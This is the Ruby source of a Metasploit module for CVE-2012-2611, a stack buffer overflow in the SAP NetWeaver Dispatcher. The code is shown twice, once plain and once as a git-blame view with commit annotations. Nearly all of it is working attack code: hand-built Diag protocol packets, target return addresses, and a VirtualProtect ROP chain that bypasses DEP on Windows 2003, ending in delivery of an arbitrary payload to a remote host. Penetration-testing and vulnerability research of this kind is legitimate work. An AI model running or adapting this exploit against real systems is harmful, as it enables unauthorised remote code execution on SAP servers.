metasploit-framework/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the SAP NetWeaver Dispatcher
        service. The overflow occurs in the DiagTraceR3Info() function and allows a remote
        attacker to execute arbitrary code by supplying a special crafted Diag packet. The
        Dispatcher service is only vulnerable if the Developer Traces have been configured
        at levels 2 or 3. The module has been successfully tested on SAP Netweaver 7.0 EHP2
        SP6 over Windows XP SP3 and Windows 2003 SP2 (DEP bypass).
      },
      'Author'      => [
        'Martin Gallo', # Vulnerability discovery and PoC
        'juan vazquez' # Metasploit module
      ],
      'References'     =>
        [
          [ 'OSVDB', '81759' ],
          [ 'CVE', '2012-2611' ],
          [ 'BID', '53424' ],
          [ 'EDB', '20705' ],
          [ 'URL', 'http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities'],
          [ 'URL', 'http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=Uncovering_SAP_vulnerabilities_reversing_and_breaking_the_Diag_protocol']
        ],
      'DefaultOptions' =>
        {
          'InitialAutoRunScript' => 'migrate -f',
          'EXITFUNC' => 'process'
        },
      'Payload'        =>
        {
          'Space'    => 4000,
          'BadChars' => "\x00",
          'DisableNops' => true,
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # disp+work.exe version 7200.70.18.23869
          [
            'SAP Netweaver 7.0 EHP2 SP6 / Windows XP SP3',
            {
              'Ret' => 0x5f7a # 0x005f007a # call ebx from disp+work.EXE
            }
          ],
          [
            'SAP Netweaver 7.0 EHP2 SP6 / Windows 2003 SP2',
            {
              'Ret' => 0x77bde7f6 # {pivot 44} # ADD ESP,2C # RETN from msvcrt.dll
            }
          ]
        ],
      'Privileged'     => false,
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'May 8 2012'))

      register_options([Opt::RPORT(3200)], self.class)

  end

  def create_rop_chain()
    # ROP chains provided by Corelan.be
    # https://www.corelan.be/index.php/security/corelan-ropdb/#msvcrtdll_8211_v7037903959_Windows_2003_SP1_SP2
    rop_gadgets =
      [
        0x77bb2563, # POP EAX # RETN
        0x77ba1114, # <- *&VirtualProtect()
        0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
        0x41414141, #junk
        0x77bb0c86, # XCHG EAX,ESI # RETN
        0x77bc9801, # POP EBP # RETN
        0x77be2265, # ptr to 'push esp #  ret'
        0x77bb2563, # POP EAX # RETN
        0x03C0A40F,
        0x77bdd441, # SUB EAX, 03c0940f  (dwSize, 0x500 -> ebx)
        0x77bb48d3, # POP EBX, RET
        0x77bf21e0, # .data
        0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
        0x77bbfc02, # POP ECX # RETN
        0x77bef001, # W pointer (lpOldProtect) (-> ecx)
        0x77bd8c04, # POP EDI # RETN
        0x77bd8c05, # ROP NOP (-> edi)
        0x77bb2563, # POP EAX # RETN
        0x03c0984f,
        0x77bdd441, # SUB EAX, 03c0940f
        0x77bb8285, # XCHG EAX,EDX # RETN
        0x77bb2563, # POP EAX # RETN
        0x90909090,#nop
        0x77be6591, # PUSHAD # ADD AL,0EF # RETN
      ].pack("V*")

    return rop_gadgets
  end

  def exploit

    peer = "#{rhost}:#{rport}"

    connect

    # initialize
    diagheader = "\x00\x10\x00\x00\x00\x00\x00\x00"
    user_connect = "\x10\x04\x02\x00\x0c\x00\x00\x00\xc8\x00\x00\x04\x4c\x00\x00\x0b\xb8"
    support_data = "\x10\x04\x0b\x00\x20"
    support_data << "\xff\x7f\xfa\x0d\x78\xb7\x37\xde\xf6\x19\x6e\x93\x25\xbf\x15\x93"
    support_data << "\xef\x73\xfe\xeb\xdb\x51\xed\x01\x00\x00\x00\x00\x00\x00\x00\x00"
    dpheader = "\xff\xff\xff\xff\x0a\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff"
    dpheader << "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
    dpheader << [diagheader.length + user_connect.length + support_data.length].pack("V")
    dpheader << "\x00\xff\xff\xff\xff\xff\xff\x20\x20\x20\x20\x20\x20\x20\x20\x20"
    dpheader << "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
    dpheader << "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
    dpheader << "terminalXXXXXXX"
    dpheader << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x20\x20\x20\x20\x20"
    dpheader << "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x00\x00"
    dpheader << "\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00"
    dpheader << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    dpheader << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    dpheader << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    dpheader << "\x00\x00\x00\x00\x00\x00\x00\x00"
    pkt = [dpheader.length + diagheader.length + user_connect.length + support_data.length].pack("N")
    pkt << dpheader
    pkt << diagheader
    pkt << user_connect
    pkt << support_data
    print_status("#{peer} - Sending initialize packet to the SAP Dispatcher")
    sock.put(pkt)
    res = sock.get_once(-1)

    if not res
      print_error("#{peer} - The connection with the Dispatcher has not been initialized")
      return
    end

    # send message
    if target.name =~ /Windows XP SP3/
      crash = make_nops(112)
      crash << "\xeb\x02" # jmp over call pointer
      crash << [target.ret].pack("v")
      crash << make_nops(10) * 200
      crash << payload.encoded
    else # Windows 2003
      crash = "C\x00" # Avoid "UNICODE" conversion when copying data to stack
      crash << rand_text(2) # padding
      crash << [0x77bd7d82].pack("V") * 55  # <== after stackpivoting esp points here # "ret" ROP nop from msvcrt
      crash << [0x77bdf0da].pack("V")  # pop eax # ret from msvcrt
      crash << [target.ret].pack("V") # stackpivot
      crash << create_rop_chain
      crash << payload.encoded
    end

    print_status("#{peer} - Sending crafted message")
    message = "\x10\x06\x20" + [crash.length].pack("n") + crash
    diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00"
    step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01"
    eom = "\x0c"
    pkt = [diagheader.length + step.length + message.length + eom.length].pack("N")
    pkt << diagheader
    pkt << step
    pkt << message
    pkt << eom
    sock.put(pkt)

    disconnect
  end

end
Added module for CVE-2012-2611 2012-09-02 22:15:56 +00:00			`##`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# This module requires Metasploit: http//metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
Added module for CVE-2012-2611 2012-09-02 22:15:56 +00:00			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
Retab modules 2013-08-30 21:28:54 +00:00			`Rank = NormalRanking`

			`include Msf::Exploit::Remote::Tcp`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow',`
			`'Description' => %q{`
			`This module exploits a stack buffer overflow in the SAP NetWeaver Dispatcher`
			`service. The overflow occurs in the DiagTraceR3Info() function and allows a remote`
			`attacker to execute arbitrary code by supplying a special crafted Diag packet. The`
			`Dispatcher service is only vulnerable if the Developer Traces have been configured`
			`at levels 2 or 3. The module has been successfully tested on SAP Netweaver 7.0 EHP2`
			`SP6 over Windows XP SP3 and Windows 2003 SP2 (DEP bypass).`
			`},`
			`'Author' => [`
			`'Martin Gallo', # Vulnerability discovery and PoC`
			`'juan vazquez' # Metasploit module`
			`],`
			`'References' =>`
			`[`
			`[ 'OSVDB', '81759' ],`
			`[ 'CVE', '2012-2611' ],`
			`[ 'BID', '53424' ],`
			`[ 'EDB', '20705' ],`
			`[ 'URL', 'http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities'],`
			`[ 'URL', 'http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=Uncovering_SAP_vulnerabilities_reversing_and_breaking_the_Diag_protocol']`
			`],`
			`'DefaultOptions' =>`
			`{`
			`'InitialAutoRunScript' => 'migrate -f',`
			`'EXITFUNC' => 'process'`
			`},`
			`'Payload' =>`
			`{`
			`'Space' => 4000,`
			`'BadChars' => "\x00",`
			`'DisableNops' => true,`
			`'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`# disp+work.exe version 7200.70.18.23869`
			`[`
			`'SAP Netweaver 7.0 EHP2 SP6 / Windows XP SP3',`
			`{`
			`'Ret' => 0x5f7a # 0x005f007a # call ebx from disp+work.EXE`
			`}`
			`],`
			`[`
			`'SAP Netweaver 7.0 EHP2 SP6 / Windows 2003 SP2',`
			`{`
			`'Ret' => 0x77bde7f6 # {pivot 44} # ADD ESP,2C # RETN from msvcrt.dll`
			`}`
			`]`
			`],`
			`'Privileged' => false,`
			`'DefaultTarget' => 1,`
			`'DisclosureDate' => 'May 8 2012'))`

			`register_options([Opt::RPORT(3200)], self.class)`

			`end`

			`def create_rop_chain()`
			`# ROP chains provided by Corelan.be`
			`# https://www.corelan.be/index.php/security/corelan-ropdb/#msvcrtdll_8211_v7037903959_Windows_2003_SP1_SP2`
			`rop_gadgets =`
			`[`
			`0x77bb2563, # POP EAX # RETN`
			`0x77ba1114, # <- *&VirtualProtect()`
			`0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN`
			`0x41414141, #junk`
			`0x77bb0c86, # XCHG EAX,ESI # RETN`
			`0x77bc9801, # POP EBP # RETN`
			`0x77be2265, # ptr to 'push esp # ret'`
			`0x77bb2563, # POP EAX # RETN`
			`0x03C0A40F,`
			`0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)`
			`0x77bb48d3, # POP EBX, RET`
			`0x77bf21e0, # .data`
			`0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN`
			`0x77bbfc02, # POP ECX # RETN`
			`0x77bef001, # W pointer (lpOldProtect) (-> ecx)`
			`0x77bd8c04, # POP EDI # RETN`
			`0x77bd8c05, # ROP NOP (-> edi)`
			`0x77bb2563, # POP EAX # RETN`
			`0x03c0984f,`
			`0x77bdd441, # SUB EAX, 03c0940f`
			`0x77bb8285, # XCHG EAX,EDX # RETN`
			`0x77bb2563, # POP EAX # RETN`
			`0x90909090,#nop`
			`0x77be6591, # PUSHAD # ADD AL,0EF # RETN`
			`].pack("V*")`

			`return rop_gadgets`
			`end`

			`def exploit`

			`peer = "#{rhost}:#{rport}"`

			`connect`

			`# initialize`
			`diagheader = "\x00\x10\x00\x00\x00\x00\x00\x00"`
			`user_connect = "\x10\x04\x02\x00\x0c\x00\x00\x00\xc8\x00\x00\x04\x4c\x00\x00\x0b\xb8"`
			`support_data = "\x10\x04\x0b\x00\x20"`
			`support_data << "\xff\x7f\xfa\x0d\x78\xb7\x37\xde\xf6\x19\x6e\x93\x25\xbf\x15\x93"`
			`support_data << "\xef\x73\xfe\xeb\xdb\x51\xed\x01\x00\x00\x00\x00\x00\x00\x00\x00"`
			`dpheader = "\xff\xff\xff\xff\x0a\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff"`
			`dpheader << "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"`
			`dpheader << [diagheader.length + user_connect.length + support_data.length].pack("V")`
			`dpheader << "\x00\xff\xff\xff\xff\xff\xff\x20\x20\x20\x20\x20\x20\x20\x20\x20"`
			`dpheader << "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"`
			`dpheader << "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"`
			`dpheader << "terminalXXXXXXX"`
			`dpheader << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x20\x20\x20\x20\x20"`
			`dpheader << "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x00\x00"`
			`dpheader << "\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00"`
			`dpheader << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"`
			`dpheader << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"`
			`dpheader << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"`
			`dpheader << "\x00\x00\x00\x00\x00\x00\x00\x00"`
			`pkt = [dpheader.length + diagheader.length + user_connect.length + support_data.length].pack("N")`
			`pkt << dpheader`
			`pkt << diagheader`
			`pkt << user_connect`
			`pkt << support_data`
			`print_status("#{peer} - Sending initialize packet to the SAP Dispatcher")`
			`sock.put(pkt)`
			`res = sock.get_once(-1)`

			`if not res`
			`print_error("#{peer} - The connection with the Dispatcher has not been initialized")`
			`return`
			`end`

			`# send message`
			`if target.name =~ /Windows XP SP3/`
			`crash = make_nops(112)`
			`crash << "\xeb\x02" # jmp over call pointer`
			`crash << [target.ret].pack("v")`
			`crash << make_nops(10) * 200`
			`crash << payload.encoded`
			`else # Windows 2003`
			`crash = "C\x00" # Avoid "UNICODE" conversion when copying data to stack`
			`crash << rand_text(2) # padding`
			`crash << [0x77bd7d82].pack("V") * 55 # <== after stackpivoting esp points here # "ret" ROP nop from msvcrt`
			`crash << [0x77bdf0da].pack("V") # pop eax # ret from msvcrt`
			`crash << [target.ret].pack("V") # stackpivot`
			`crash << create_rop_chain`
			`crash << payload.encoded`
			`end`

			`print_status("#{peer} - Sending crafted message")`
			`message = "\x10\x06\x20" + [crash.length].pack("n") + crash`
			`diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00"`
			`step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01"`
			`eom = "\x0c"`
			`pkt = [diagheader.length + step.length + message.length + eom.length].pack("N")`
			`pkt << diagheader`
			`pkt << step`
			`pkt << message`
			`pkt << eom`
			`sock.put(pkt)`

			`disconnect`
			`end`
Added module for CVE-2012-2611 2012-09-02 22:15:56 +00:00
			`end`